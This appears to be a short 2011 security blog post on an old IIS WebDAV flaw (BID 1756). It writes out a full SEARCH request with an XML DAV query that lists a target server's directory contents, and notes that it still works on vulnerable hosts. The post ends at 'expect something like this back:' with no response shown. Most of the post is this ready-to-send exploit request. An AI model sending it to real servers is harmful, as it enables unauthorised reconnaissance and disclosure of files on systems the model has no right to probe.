Friday
Aug262011
IIS Search Verb Directory Listing
Friday, August 26, 2011 at 2:56PM This: http://www.securityfocus.com/bid/1756 still works (on vulnerable hosts, this is an old vuln) and is very useful:
Send this:
SEARCH / HTTP/1.1
Host: target
Content-Type: text/xml
Content-Length: 133
<?xml version="1.0"?>
<g:searchrequest xmlns:g="DAV:">
<g:sql>
Select "DAV:displayname" from scope()
</g:sql>
</g:searchrequest>
And expect something like this back:
